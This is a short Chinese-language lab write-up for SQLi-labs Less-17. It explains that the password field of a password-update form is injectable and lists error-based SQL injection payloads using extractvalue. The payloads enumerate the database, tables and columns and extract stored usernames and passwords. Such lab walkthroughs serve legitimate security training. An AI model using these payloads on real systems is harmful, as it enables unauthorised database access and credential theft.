Update
数据库更新注入,具体情况,具体分析
函数 check_input 对 '$uname' 进行检查,从 '$uname' 处是无法注入了
而对 '$passwd' 进行了更新,可以利用这个 updata 进行注入
注意:这里必须的 'uname' 必须是数据已有的记录
Less-17
闭合字符:'$passwd'
判断闭合字符:在username多次判断闭合字符无果,考虑对password位置注入
uname=admin&passwd=password'&Submit=Submit
#password 可以随便输入,updata 会对密码进行更新
查询当前数据库:
uname=admin&passwd=password' or extractvalue(1,concat(0x7e,database())) #&Submit=Submit
查询当前数据库的表:
uname=admin&passwd=password' or extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema="security"))) #&Submit=Submit
查询当前表的字段:
uname=admin&passwd=password' or extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users"))) #&Submit=Submit
查询数据:
uname=admin&passwd=password' or extractvalue(1,concat(0x7e,substr((select group_concat(username,'@',password) from security.users),1,31))) #&Submit=Submit
uname=admin&passwd=password' or extractvalue(1,concat(0x7e,substr((select group_concat(username,'@',password) from security.users),31,31))) #&Submit=Submit
...